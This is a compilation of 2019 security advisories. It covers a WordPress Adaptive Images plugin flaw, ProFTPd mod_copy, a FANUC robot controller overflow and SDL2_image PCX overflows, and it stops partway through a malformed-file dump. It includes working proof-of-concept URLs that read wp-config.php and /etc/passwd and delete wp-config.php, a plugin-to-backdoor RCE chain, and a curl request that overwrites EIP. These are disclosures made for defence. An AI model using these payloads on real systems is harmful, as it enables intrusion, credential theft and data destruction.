An Arbitrary File Deletion vulnerability in the Nevma Adaptive Images plugin before 0.6.67 for WordPress allows remote attackers to delete arbitrary files via the $REQUEST['adaptive-images-settings'] parameter in adaptive-images-script.php.

**LFI (Local file inclusion), Arbitrary file deletion and RCE in Adaptive Images for WordPress plugin.**

This plugin, developed by Nevma is used to serve images in Wordpress based on device resolution, allowing an on-the-fly resize. It is useful to decrease the page load for mobile devices.

The analyzed version is **0.6.66** on a fresh WordPress installation 5.2.2.

Due to an exposed variable an unauthenticated attacker can exploit a vulnerability that can lead to a LFI (Local File Inclusion) and to Arbitrary File Deletion.

Sensible system and Wordpress file can be easily exfiltrated and the two vulnerabilities can be used to obtain RCE (Remote Command Execution).

****INTRO****

**Adaptive Images for WordPress** serves images through a PHP script, adaptive-images-script.php.

All requests made to image assets that appear in specific folders (the plugin settings allow to change these folders) are redirected through this script that eventually manipulate the image before serving it.

At **line 877** the plugin settings are collected:

      $settings = adaptive_images_script_get_settings();
    

This method at **line 62** checks if the $_REQUEST['adaptive-images-settings'] is present and if not it overrides and composes it according the default configuration.

    
        function adaptive_images_script_get_settings () {
    
            // Setup script settings.
    
            if ( ! isset( $_REQUEST['adaptive-images-settings'] ) ) {
    
        ...
    
        // Setup script settings and save the in request scope.
    
        $_REQUEST['adaptive-images-settings'] = array(
            'debug'          => $debug,
            'resolutions'    => $resolutions,
            'cache_dir'      => $cache_dir,
            'jpg_quality'    => $jpg_quality,
            'png8'           => $png8,
            'sharpen'        => $sharpen,
            'watch_cache'    => $watch_cache,
            'browser_cache'  => $browser_cache,
            'request_uri'    => $request_uri,
            'source_file'    => $source_file,
            'wp_content'     => $wp_content_dir,
            'client_width'   => $client_width,
            'hidpi'          => $hidpi,
            'pixel_density'  => $pixel_density,
            'resolution'     => $resolution
        );
    

At the end of the method the function simply return the $_REQUEST['adaptive-images-settings'] variable.

      return $_REQUEST['adaptive-images-settings'];
    

This logic allows any visitor to set and override the $_REQUEST['adaptive-images-settings'] just passing it to the request.

**Having control on this variable allows an attacker to exploit two major vulnerabilities.**

The parameter $_REQUEST['adaptive-images-settings']['source_file'] allows an attacker to set in an arbitrary way the file requested that will be served from the script.

Even if it is not possible to manipulate the Content-Type header, the script will generate a malformed image that contains the requested file.

This vulnerability in combination with other server misconfiguration can lead to RCE (Remote Command Execution) using log poisoning technique, /proc/self/environ technique and others.

****POC****

http://wp-vulnerable/wp-content/uploads/2019/05/image.jpg?adaptive-images-settings[source_file]=../../../wp-config.php

http://wp-vulnerable/wp-content/uploads/2019/05/image.jpg?adaptive-images-settings[source_file]=/etc/passwd

_The image used to trigger the vulnerability should exist._

****Arbitrary File Deletion****

The plugin contains a cache mechanism that allows the generated resized images to be saved and cached to prevent excessive resources usage.

As every cache mechanism a file should be deleted if the source is newer than the cache file.  
**This feature can be abused to delete an arbitrary file accessible from the Wordpress installation.**

On **line 977** is called the function that removes a stale cache image:

        // Locate cached image.
    
        $cache_file = $settings['wp_content'] . '/' . $settings['cache_dir'] . '/' . $settings['resolution'] . $settings['request_uri'];
    
    
    
        // Check if cached image if stale and relete it if so.
    
        if ( file_exists( $cache_file ) ) {
    
            // Check if cached image is stale and delete it if so.
    
            if ( $settings['watch_cache'] ) {
    
                adaptive_images_delete_stale_cache_image( $settings['source_file'], $cache_file, $settings['resolution'] );
    
            }
    
        }
    

Every variable used in this code is controlled by the aforementioned $_REQUEST['adaptive-images-settings'] variable.

The adaptive_images_delete_stale_cache_image function just checks if the $cache_files exists and if it is newer than the original one.

The only condition to successfully exploit this vulnerability is that the file that we pass as $source_file is newer than the file that we pass as $cache_file.

        function adaptive_images_delete_stale_cache_image ( $source_file, $cache_file, $resolution ) {
    
            if ( file_exists( $cache_file ) ) {
    
                // Check image file timestamp.
    
                if ( filemtime( $cache_file ) >= filemtime( $source_file ) ) {
    
                    return $cache_file;
    
                }
    
                unlink( $cache_file );
            }
    
        }
    

****POC****

Using relative paths we set as $source_file an image (or any other file) that exists in the website and as $cache_file (our target) the wp-config.php.  
In this way it is almost certain that the image is more recent than the target file.

Some other variables should be manipulated to pass some checks and build the correct path of the target file.

_This POC deletes the wp-config.php, test it carefully._

http://wp-vulnerable/wp-content/uploads/2019/07/image.jpeg?adaptive-images-settings[source_file]=../../../wp-content/uploads/2019/07/image.jpeg&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1

****BONUS: LFI + Arbitrary file deletion = RCE****

Combining the previous two vulnerabilities an attacker can obtain a bold (and not really stealth) Remote Code Execution on the server.

This is the exploit process:

1.  Dump the current wp-config.php
2.  Delete the current wp-config.php
3.  Install a fake WordPress alongside the real one (DB credentials are known, a random db\_prefix should be chosen to not overwrite the current installation).
4.  Log in the fake WordPress to patch a plugin or theme file to set up a backdoor
5.  Use the backdoor to restore the previous wp-config.php and remove the fake WordPress installation from the database.

This process can be automated and executed in less than 1 minute. During the process the website will not be reachable (exploit).

****Time Line****

Date

What

2019/07/08

Vulnerability reported to plugin developer company using the email found in code. No response.

2019/07/11

Vulnerability reported directly to plugin developer.

2019/07/11

The vulnerability was verified by the plugin developer.

2019/07/11

A fix was released in version 0.6.7.

2019/07/19

Public disclosure.

Special thanks to Takis @ Nevma for his availability and for the quick release of the fix.

CVE-2019-14206: Adaptive images for Wordpress 0.6.66: LFI, arbitrary file deletion and RCE.

An arbitrary file copy vulnerability in mod_copy in ProFTPD up to 1.3.5b allows for remote code execution and information disclosure without authentication, a related issue to CVE-2015-3306.

**ID: CVE-2019-12815****Title: ProFTPd mod\_copy - arbitrary file copy with improper access control****Release Date: 2019-07-18****Severity: Important****Overview:**

Manawyrm has identified a vulnerability in ProFTPd's mod\_copy. mod\_copy is supplied in the default installation of ProFTPd and is enabled by default in most distributions (e.g. Debian).

**Details:****1: CVE-2019-12815: mod\_copy Incorrect Access Control**

**Description:** Issueing CPFR, CPTO commands to a ProFTPd server allows users without write permissions to copy any file on the FTP server.  
**Fix:** https://github.com/proftpd/proftpd/pull/816  
**Workaround #1:** Disable mod\_copy in the ProFTPd configuration file.

ProFTPd Bugtracker: http://bugs.proftpd.org/show\_bug.cgi?id=4372

**Timeline:**

*   28.09.2018 Reported to ProFTPd security@, ProFTPd asking for clarifications
*   12.06.2019 Reported to Debian Security Team, replies by Moritz & Salvatore
*   28.06.2019 Deadline for public disclosure on 28.07.2019 announced
*   17.07.2019 Fix published by ProFTPd

Update 23.07.2019: Contrary to news reports, **_ProFTPd 1.3.6 is also affected_** and does not contain the fix.  
ProFTPd 1.3.6a contains the fix.

**Acknowledgments:**

Thanks to Salvatore Bonaccorso and Moritz Mühlenhoff from the Debian Security Team  
Thanks to TJ from ProFTPd for fixing the issue

CVE-2019-12815: ProFTPd CVE-2019-12815

The remote admin webserver on FANUC Robotics Virtual Robot Controller 8.23 has a Buffer Overflow via a forged HTTP request.

  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Advisory ID: SYSS-2019-024  
Product: FANUC Robotics Virtual Robot Controller  
Manufacturer: FANUC Robotics America, Inc.  
Affected Version(s): V8.23  
Tested Version(s): V8.23  
Vulnerability Type: Stack-based Buffer Overflow (CWE-121)   
Risk Level: High  
Solution Status: Open  
Manufacturer Notification: 2019-05-22  
Solution Date: ?  
Public Disclosure: 2019-07-15  
CVE Reference: CVE-2019-13585  
Author of Advisory: Sebastian Hamann, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

FANUC Robotics Virtual Robot Controller is an application for  
programming simulated industry robots.

Due to a stack-based buffer overflow, the remote admin web server  
(vrimserve.exe) is vulnerable to denial-of-service and remote code  
execution attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

vrimserve.exe offers an HTTP service on TCP port 8090, which can be used  
to control virtual robots and view their log files.

A buffer overflow vulnerability was discovered in the log viewer  
functionality. By sending a specially crafted HTTP request to the HTTP  
server, the application can be crashed causing a denial-of-service  
condition.

Remote code execution may also be possible, but was not confirmed  
by SySS GmbH. Gaining control over the instruction pointer (EIP) of this  
32 bit application by exploiting the stack-based buffer overflow  
vulnerability was successful.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

SySS GmbH developed a proof-of-concept exploit that crashes  
vrimserve.exe. It is to note that the exploit gives control over the EIP  
register, which is an important prerequisite for remote code execution.

curl "http://${target_host}:8090/namedrobots/folder/dir/<1268 bytes>BBBBCCCCCCCCC"

The bytes denoted as B overwrite the EIP register.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The vendor has not yet released a security update.

It is recommended not making the remote admin web server (vrimserve.exe)  
available to untrusted networks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2019-04-23: Vulnerability discovered  
2019-05-22: Vulnerability reported to manufacturer  
2019-07-15: Public release of SySS security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Manufacturer website:  
    https://www.fanucamerica.com/  
[2] SySS Security Advisory SYSS-2019-024  
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-024.txt  
[3] SySS Responsible Disclosure Policy  
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Sebastian Hamann of SySS GmbH.

E-Mail: sebastian.hamann@syss.de  
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc  
Key ID: 0x9CE0E440429D8B96  
Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"   
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEE9kPfIWLEfFN9souhnODkQEKdi5YFAl0snAwACgkQnODkQEKd  
i5ZIqw//bdjzLHzqTtVHEnqFDORa1xmD9478c/57WBKW+kVH/NMupv5CwjsFEJvq  
hhY/Ju1Yl+m0kz3R+orHKgUw6VTdfAiogOS/OIW+8yozUQ1lPRDhKcKe/Ai2X2kj  
/A/y8mgR43AX2ddcf6tr5XeOeJHgzK3Up8y0fbkvRPQ7aszzWRYCQr4CmXtSsaAf  
qxg5fzBwzVEHhDni/tBe6bCqBmV9r+4yi0L2BGV+Cxo08gbsLkAiIhUHJnLG1GbM  
mKYFk7v+8JecXEIu12ZiH8Zofn9p2ePeQw/u64VsuUJ+dCJMlyLeAOgXpQiIIt8z  
dNj5MS6w37b+4Dc/C7mlfDb9GPGGMyhyK5+TX8KT5LG1MVOyYocnbrD23xSRNSAi  
8HhLszTyXcXwkKhsRWelvrEcxaiIsm5y0/4X2gJ/PeTkZNlOPgyD3xv7bth3jUYK  
Bcb7NSgp+5FZcaG/moT1W5zL7WFj9wnFd2w4glIPVDUtgy5FQM0cdnGNr1KNvqZB  
Esn3Tylbmzt7uQKuT/pZOFk1QQ8VoSnPmyWB6tyBFhTCZxfR+V+MKTIPrCFjrvpQ  
D/XDcAT5gqZQHPVK3FI6T8TqF2wS5xoHfNJcPdh6r52puREImY509sze6VWUfzpp  
3hfYCusmlwJye9+cbllFCiLNegSNCDBS+nDrRCCXd3QaoOYjls4=  
=hm7Q  
-----END PGP SIGNATURE-----

CVE-2019-13585: FANUC Robotics Virtual Robot Controller 8.23 Buffer Overflow ≈ Packet Storm

A Use After Free: CWE-416 vulnerability exists in Zelio Soft 2, V5.2 and earlier, which could cause remote code execution when opening a specially crafted Zelio Soft 2 project file.

Date : 08/07/2019 Type : Technical leaflet  

Languages : English Latest Version : 1.0

Reference : SEVD-2019-190-01

Date : 08/07/2019 Type : Technical leaflet Languages : English Latest Version : 1.0 Reference : SEVD-2019-190-01

CVE-2019-6822: Security Notification - Zelio Soft 2 | Schneider Electric

A remote code execution vulnerability exists in Remote Desktop Services - formerly known as Terminal Services - when an authenticated attacker abuses clipboard redirection, aka 'Remote Desktop Services Remote Code Execution Vulnerability'.

CVE-2019-0887

An exploitable heap-based buffer overflow vulnerability exists when loading a PCX file in SDL2_image, version 2.0.4. A missing error handler can lead to a buffer overflow and potential code execution. An attacker can provide a specially crafted image file to trigger this vulnerability.

**Summary**

An exploitable heap-based buffer overflow vulnerability exists when loading a PCX file in SDL2\_image, version 2.0.4. A missing error handler can lead to a buffer overflow and potential code execution. An attacker can provide a specially crafted image file to trigger this vulnerability.

**Tested Versions**

Simple DirectMedia Layer SDL2\_image 2.0.4

**Product URLs**

https://www.libsdl.org/projects/SDL\_image/

**CVSSv3 Score**

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-390: Detection of Error Condition Without Action

**Details**

This vulnerability is present in the SDL2\_image library, which is used for loading images in different formats.

There is a vulnerability in the function responsible for loading PCX files. A specially crafted PCX file can lead to a heap buffer overflow and remote code execution.

Let’s investigate this vulnerability. After we attempt to load a malformed PCX file, the following state appears:

    ./showimage PoC.pcx
    =================================================================
    ==25249==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb2c32848 at pc 0x08057d04 bp 0xbf987968 sp 0xbf987958
    WRITE of size 1 at 0xb2c32848 thread T0
    	#0 0x8057d03 in IMG_LoadPCX_RW ../IMG_pcx.c:178
    	#1 0x804c301 in IMG_LoadTyped_RW ../IMG.c:195
    	#2 0x804beff in IMG_Load ../IMG.c:136
    	#3 0x804c3e7 in IMG_LoadTexture ../IMG.c:212
    	#4 0x804b65c in main ../showimage.c:101
    	#5 0xb7014636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636)
    	#6 0x804ad50  (/home/icewall/bugs/SDL_src/SDL2_image-2.0.4/build/showimage+0x804ad50)
    
    0xb2c32848 is located 0 bytes to the right of 264-byte region [0xb2c32740,0xb2c32848)
    allocated by thread T0 here:
    	#0 0xb72c0dee in malloc (/usr/lib/i386-linux-gnu/libasan.so.2+0x96dee)
    	#1 0x81258d2 in SDL_malloc_REAL /home/icewall/bugs/SDL_src/SDL2-2.0.9/src/stdlib/SDL_malloc.c:5328
    	#2 0x813cbca in SDL_CreateRGBSurfaceWithFormat_REAL /home/icewall/bugs/SDL_src/SDL2-2.0.9/src/video/SDL_surface.c:122
    	#3 0x813ce89 in SDL_CreateRGBSurface_REAL /home/icewall/bugs/SDL_src/SDL2-2.0.9/src/video/SDL_surface.c:166
    	#4 0x80abf8f in SDL_CreateRGBSurface /home/icewall/bugs/SDL_src/SDL2-2.0.9/src/dynapi/SDL_dynapi_procs.h:473
    	#5 0x805797c in IMG_LoadPCX_RW ../IMG_pcx.c:141
    	#6 0x804c301 in IMG_LoadTyped_RW ../IMG.c:195
    	#7 0x804beff in IMG_Load ../IMG.c:136
    	#8 0x804c3e7 in IMG_LoadTexture ../IMG.c:212
    	#9 0x804b65c in main ../showimage.c:101
    	#10 0xb7014636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow ../IMG_pcx.c:178 IMG_LoadPCX_RW
    Shadow bytes around the buggy address:
      0x365864b0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x365864c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x365864d0: 00 00 00 00 00 00 00 00 01 fa fa fa fa fa fa fa
      0x365864e0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x365864f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x36586500: 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa
      0x36586510: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
      0x36586520: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x36586530: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa
      0x36586540: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
      0x36586550: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Heap right redzone:      fb
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack partial redzone:   f4
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
    ==25249==ABORTING
    

A heap-based buffer overflow appeared inside the IMG_LoadPCX_RW function. Let’s take a closer look at the code where the vulnerability takes place:

    IMG_pcx.c
    146	   bpl = pcxh.NPlanes * pcxh.BytesPerLine;
    147	   if (bpl > surface->pitch) {
    148		 error = "bytes per line is too large (corrupt?)";
    149	   }	
    150    buf = (Uint8 *)SDL_calloc(SDL_max(bpl, surface->pitch), 1);
    151    row = (Uint8 *)surface->pixels;	
    152    for ( y=0; y<surface->h; ++y ) {
    153        /* decode a scan line to a temporary buffer first */
    154        int i, count = 0;
    155        Uint8 ch;
    156        Uint8 *dst = (src_bits == 8) ? row : buf;
    157        if ( pcxh.Encoding == 0 ) {
    158            if(!SDL_RWread(src, dst, bpl, 1)) {
    159                error = "file truncated";
    160                goto done;
    161            }
    162        } else {
    163            for(i = 0; i < bpl; i++) {
    164                if(!count) {
    165                    if(!SDL_RWread(src, &ch, 1, 1)) {
    166                        error = "file truncated";
    167                        goto done;
    168                    }
    169                    if( (ch & 0xc0) == 0xc0) {
    170                        count = ch & 0x3f;
    171                        if(!SDL_RWread(src, &ch, 1, 1)) {
    172                            error = "file truncated";
    173                            goto done;
    174                        }
    175                    } else
    176                        count = 1;
    177                }
    178                dst[i] = ch;
    179                count--;
    180            }
    181        }
    
    		(...)
    
    214        row += surface->pitch;
    215    }
    

The overflow appears at line 178. It happens because, as you can see at line 147, the calculated bpl value is checked against the surface->pitch field. If bpl is bigger, the error variable is set at line 148, but no action is taken (like e.g in lines 159-160 where the goto done instruction is executed).  
That lack of action leads to a heap-based buffer overflow in a scenario where src_bits is equal to 8, causing the dst pointer to have the value of row, where row == surface->pixels.

The overflow will take place during the first iteration, when bpl > sizeof(surface->pixels), or later because in line 214 the row pointer is moved by the value of surface->pitch.

A dump of malformed PCX file :

    struct PCX file			0h	80h	Fg: Bg:	
    ubyte Manufacturer		Ah	0h	1h	Fg: Bg:	
    enum PCX_TYPE version	v3up (5h)	1h	1h	Fg: Bg:	
    ubyte encoding			1h	2h	1h	Fg: Bg:	
    ubyte BitsPerPixel		8h	3h	1h	Fg: Bg:	
    ushort Xmin				FF7Fh	4h	2h	Fg: Bg:	
    ushort Ymin				FFFFh	6h	2h	Fg: Bg:	
    ushort Xmax				0h	8h	2h	Fg: Bg:	
    ushort Ymax				0h	Ah	2h	Fg: Bg:	
    ushort HDpi				100h	Ch	2h	Fg: Bg:	
    ushort VDpi				101h	Eh	2h	Fg: Bg:	
    ubyte Colormap[48]		10h	30h	Fg: Bg:	
    ubyte Reserved			1h	40h	1h	Fg: Bg:	
    ubyte NPlanes			1h	41h	1h	Fg: Bg:	
    ushort BytesPerLine		1000h	42h	2h	Fg: Bg:	
    ushort PaletteInfo		1001h	44h	2h	Fg: Bg:	
    ushort HscreenSize		0h	46h	2h	Fg: Bg:	
    ushort VscreenSize		100h	48h	2h	Fg: Bg:	
    ubyte Filler[54]		4Ah	36h	Fg: Bg:	
    

An attacker fulling controlling the size of overwrite and its content can turn this heap-based buffer overflow in a remote code execution.

**Crash Information**

    ./showimage PoC.pcx
    =================================================================
    ==25249==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb2c32848 at pc 0x08057d04 bp 0xbf987968 sp 0xbf987958
    WRITE of size 1 at 0xb2c32848 thread T0
    	#0 0x8057d03 in IMG_LoadPCX_RW ../IMG_pcx.c:178
    	#1 0x804c301 in IMG_LoadTyped_RW ../IMG.c:195
    	#2 0x804beff in IMG_Load ../IMG.c:136
    	#3 0x804c3e7 in IMG_LoadTexture ../IMG.c:212
    	#4 0x804b65c in main ../showimage.c:101
    	#5 0xb7014636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636)
    	#6 0x804ad50  (/home/icewall/bugs/SDL_src/SDL2_image-2.0.4/build/showimage+0x804ad50)
    
    0xb2c32848 is located 0 bytes to the right of 264-byte region [0xb2c32740,0xb2c32848)
    allocated by thread T0 here:
    	#0 0xb72c0dee in malloc (/usr/lib/i386-linux-gnu/libasan.so.2+0x96dee)
    	#1 0x81258d2 in SDL_malloc_REAL /home/icewall/bugs/SDL_src/SDL2-2.0.9/src/stdlib/SDL_malloc.c:5328
    	#2 0x813cbca in SDL_CreateRGBSurfaceWithFormat_REAL /home/icewall/bugs/SDL_src/SDL2-2.0.9/src/video/SDL_surface.c:122
    	#3 0x813ce89 in SDL_CreateRGBSurface_REAL /home/icewall/bugs/SDL_src/SDL2-2.0.9/src/video/SDL_surface.c:166
    	#4 0x80abf8f in SDL_CreateRGBSurface /home/icewall/bugs/SDL_src/SDL2-2.0.9/src/dynapi/SDL_dynapi_procs.h:473
    	#5 0x805797c in IMG_LoadPCX_RW ../IMG_pcx.c:141
    	#6 0x804c301 in IMG_LoadTyped_RW ../IMG.c:195
    	#7 0x804beff in IMG_Load ../IMG.c:136
    	#8 0x804c3e7 in IMG_LoadTexture ../IMG.c:212
    	#9 0x804b65c in main ../showimage.c:101
    	#10 0xb7014636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow ../IMG_pcx.c:178 IMG_LoadPCX_RW
    Shadow bytes around the buggy address:
      0x365864b0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x365864c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x365864d0: 00 00 00 00 00 00 00 00 01 fa fa fa fa fa fa fa
      0x365864e0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x365864f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x36586500: 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa
      0x36586510: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
      0x36586520: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
      0x36586530: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa
      0x36586540: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
      0x36586550: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Heap right redzone:      fb
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack partial redzone:   f4
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
    ==25249==ABORTING
    

**Timeline**

2019-05-08 - Vendor Disclosure  
2019-07-02 - Vendor Patched; Public Release

Discovered by Marcin 'Icewall' Noga of Cisco Talos.

CVE-2019-5051: TALOS-2019-0820 || Cisco Talos Intelligence Group

An exploitable integer overflow vulnerability exists when loading a PCX file in SDL2_image 2.0.4. A specially crafted file can cause an integer overflow, resulting in too little memory being allocated, which can lead to a buffer overflow and potential code execution. An attacker can provide a specially crafted image file to trigger this vulnerability.

**Summary**

An exploitable integer overflow vulnerability exists when loading a PCX file in SDL2\_image 2.0.4. A specially crafted file can cause an integer overflow, resulting in too little memory being allocated, which can lead to a buffer overflow and potential code execution. An attacker can provide a specially crafted image file to trigger this vulnerability.

**Tested Versions**

Simple DirectMedia Layer SDL2\_image 2.0.4

**Product URLs**

https://www.libsdl.org/projects/SDL\_image/

**CVSSv3 Score**

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-190: Integer Overflow or Wraparound

**Details**

This vulnerability is present in the SDL2\_image library, which is used for loading images in different formats.

There is a vulnerability in the function responsible for loading PCX files. A specially crafted PCX file can lead to a heap buffer overflow and remote code execution.

Let’s investigate this vulnerability. After we attempt to load a malformed PCX file, the following state appears:

    	./showimage PoC.pcx
    ==12669==ERROR: AddressSanitizer: attempting free on address which was not malloc()-ed: 0xa896ce70 in thread T0
    	#0 0xb7245a84 in free (/usr/lib/i386-linux-gnu/libasan.so.2+0x96a84)
    	#1 0x81259b3 in SDL_free_REAL /home/icewall/bugs/SDL_src/SDL2-2.0.9/src/stdlib/SDL_malloc.c:5372
    	#2 0x8131dd2 in SDL_FreePalette_REAL /home/icewall/bugs/SDL_src/SDL2-2.0.9/src/video/SDL_pixels.c:735
    	#3 0x8131b32 in SDL_SetPixelFormatPalette_REAL /home/icewall/bugs/SDL_src/SDL2-2.0.9/src/video/SDL_pixels.c:685
    	#4 0x813d1f5 in SDL_SetSurfacePalette_REAL /home/icewall/bugs/SDL_src/SDL2-2.0.9/src/video/SDL_surface.c:221
    	#5 0x81448d1 in SDL_FreeSurface_REAL /home/icewall/bugs/SDL_src/SDL2-2.0.9/src/video/SDL_surface.c:1233
    	#6 0x80abfd7 in SDL_FreeSurface /home/icewall/bugs/SDL_src/SDL2-2.0.9/src/dynapi/SDL_dynapi_procs.h:475
    	#7 0x805875f in IMG_LoadPCX_RW ../IMG_pcx.c:252
    	#8 0x804c301 in IMG_LoadTyped_RW ../IMG.c:195
    	#9 0x804beff in IMG_Load ../IMG.c:136
    	#10 0x804c3e7 in IMG_LoadTexture ../IMG.c:212
    	#11 0x804b65c in main ../showimage.c:101
    	#12 0xb6f99636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636)
    	#13 0x804ad50  (/home/icewall/bugs/SDL_src/SDL2_image-2.0.4/build/showimage+0x804ad50)
    
    0xa896ce70 is located 0 bytes inside of 536870912-byte region [0xa896ce70,0xc896ce70)
    

It looks like the heap has been corrupted, and application is crashing while free-ing. Let’s take a closer look at the code where the vulnerability takes place:

    IMG_pcx.c
    146	   bpl = pcxh.NPlanes * pcxh.BytesPerLine;
    147	   if (bpl > surface->pitch) {
    148		 error = "bytes per line is too large (corrupt?)";
    149	   }	
    150    buf = (Uint8 *)SDL_calloc(SDL_max(bpl, surface->pitch), 1);
    151    row = (Uint8 *)surface->pixels;	
    152    for ( y=0; y<surface->h; ++y ) {
    153        /* decode a scan line to a temporary buffer first */
    154        int i, count = 0;
    155        Uint8 ch;
    156        Uint8 *dst = (src_bits == 8) ? row : buf;
    157        if ( pcxh.Encoding == 0 ) {
    158            if(!SDL_RWread(src, dst, bpl, 1)) {
    159                error = "file truncated";
    160                goto done;
    161            }
    162        } else {
    163            for(i = 0; i < bpl; i++) {
    164                if(!count) {
    165                    if(!SDL_RWread(src, &ch, 1, 1)) {
    166                        error = "file truncated";
    167                        goto done;
    168                    }
    169                    if( (ch & 0xc0) == 0xc0) {
    170                        count = ch & 0x3f;
    171                        if(!SDL_RWread(src, &ch, 1, 1)) {
    172                            error = "file truncated";
    173                            goto done;
    174                        }
    175                    } else
    176                        count = 1;
    177                }
    178                dst[i] = ch;
    179                count--;
    180            }
    181        }
    
    		(...)
    
    214        row += surface->pitch;
    215    }
    

The overflow appears at line 158. It happens because, as you can see at line 147, the calculated bpl value is checked against the surface->pitch field. Because both variables are of type signed integer, there is a scenario where e.g bpl = -1 and surface->pitch = 1, which causes that condition to be satisfied.

Later, assuming that src_bits is equal to 8, the dst pointer will have the value of row, where row == surface->pixels.

Now, calling SDL_RWread function at line 158 with a size argument equal bpl, bpl’s signed value will be treated as a size_t (unsigned), which consequently leads to reading UINT_MAX bytes from the file.

A dump of a malformed PCX file:

    struct PCX file			0h	80h	Fg: Bg:	
    ubyte Manufacturer		10	0h	1h	Fg: Bg:	
    enum PCX_TYPE version	v3up (5)	1h	1h	Fg: Bg:	
    ubyte encoding			0	2h	1h	Fg: Bg:	
    ubyte BitsPerPixel		1	3h	1h	Fg: Bg:	
    ushort Xmin				0	4h	2h	Fg: Bg:	
    ushort Ymin				0	6h	2h	Fg: Bg:	
    ushort Xmax				0	8h	2h	Fg: Bg:	
    ushort Ymax				257	Ah	2h	Fg: Bg:	
    ushort HDpi				511	Ch	2h	Fg: Bg:	
    ushort VDpi				257	Eh	2h	Fg: Bg:	
    ubyte Colormap[48]		10h	30h	Fg: Bg:	
